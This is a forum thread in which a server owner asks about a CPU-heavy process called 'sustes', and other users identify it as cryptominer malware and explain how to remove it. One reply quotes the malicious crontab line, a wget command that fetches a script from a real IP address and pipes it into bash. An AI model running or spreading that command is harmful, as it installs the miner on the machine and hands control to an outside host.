What is this "sustes" in my process in my CPU stats?

July 11, 2018 1.6k views
Apache Ubuntu 16.04

Under CPU Processes I have one thread running high at 54.50 %
I have no clue what does it mean...

3 Answers

Hello friend!

I'm afraid I have not heard of a process that identifies itself by that name, but that would generally be true of many applications that I have not personally used so it does not necessarily mean that anything is working other than in the intended way.

The short version of what this means is that software on your server is utilizing the CPU, and under an ideal scenario you would know what that software was in relation to how you set up the server and what that server's role is.

Going a bit deeper, I would SSH in and run "top" and then press C to reveal more about the process, particularly under the Command column. You should be able to see in more detail where it is being ran from and what user on the system is running it. From there your path is a bit more of an unwritten story, as what you do next depends heavily on what you want to do and whether or not that is something that should be running on your system.

Kind Regards,
Jarland

We've found a similar script/process.
Turned out our test server had been compromised and its actually been mining crypto currency.

Check the crontab file for the following:

* * * * * wget -q -O - http://192.99.142.248:8220/mr.sh | bash -sh > /dev/null 2>&1

Edit: not sure if I should remove the IP address

This is a cryptominer malware. You must delete it from your droplets.
First delete this cron job. It runs under user, which called process "sustes". You can find this username with "top" or in output of this comand:
ps aux | grep sustes

Then look at cron job of this user:
crontab -u username -l
If it has this string

then edit this crobjob
crontab -e -u username

or delete at all by
crontab -r -u username

Then delete these files
/var/tmp/sustes
/var/tmp/sustes3
/var/tmp/wc.conf
/var/tmp/123

Have another answer? Share your knowledge.